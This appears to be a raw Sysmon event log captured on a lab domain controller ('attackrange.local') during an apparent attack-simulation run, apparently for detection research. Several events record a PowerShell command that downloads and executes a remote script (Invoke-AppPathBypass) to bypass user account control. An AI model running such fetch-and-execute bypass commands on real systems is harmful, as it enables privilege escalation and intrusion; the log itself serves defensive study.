22:53:37.739{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-7071-603D-5888-00000000AD01}8860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001695748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:53:37.707{05ADC7E1-7071-603D-5888-00000000AD01}8860\PSHost.132591128176260490.8860.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001695747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.692{05ADC7E1-7071-603D-5888-00000000AD01}8860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_ftxw3vxu.1d5.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.692{05ADC7E1-7071-603D-5888-00000000AD01}8860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_mvawoepv.dfu.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001695745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.673{05ADC7E1-7071-603D-5888-00000000AD01}8860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_mvawoepv.dfu.ps12021-03-01 22:53:37.673 10341000x80000000000000001695744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.667{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-7071-603D-5888-00000000AD01}8860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7071-603D-5888-00000000AD01}8860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-7071-603D-5888-00000000AD01}8860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-7071-603D-5788-00000000AD01}88805048C:\Windows\system32\cmd.exe{05ADC7E1-7071-603D-5888-00000000AD01}8860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001695736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.626{05ADC7E1-7071-603D-5888-00000000AD01}8860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7071-603D-5788-00000000AD01}8880C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"" 10341000x80000000000000001695735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7071-603D-5788-00000000AD01}8880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7071-603D-5788-00000000AD01}8880C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001695733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-229F-6039-0C00-00000000AD01}5887908C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-7071-603D-5788-00000000AD01}8880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001695728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-7071-603D-5788-00000000AD01}8880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001695727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.615{05ADC7E1-7071-603D-5788-00000000AD01}8880C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001695726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.614{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001695725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.598{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001695724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.442{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EF2EDC2F03BC018A34DCB8F0BA8A6C55,SHA256=3CD7644F9D6D7CB52F29CE079BABCA0D6CEA127BFDD4BBD2AD4F8C4A4BF9F9C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001695723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.395{05ADC7E1-706F-603D-5588-00000000AD01}4116ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001695722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:29.464{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55124-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local445microsoft-ds 354300x80000000000000001695721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:29.463{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55124-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local445microsoft-ds 23542300x80000000000000001695720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.246{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86BAD1795C68A3F683906BEEAFE6987C,SHA256=AA7404DD0F82F903A920B3B35C41D41F3C44952772A04FB212D16F269F1D33C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001695719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:37.224{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0aa5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001695718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 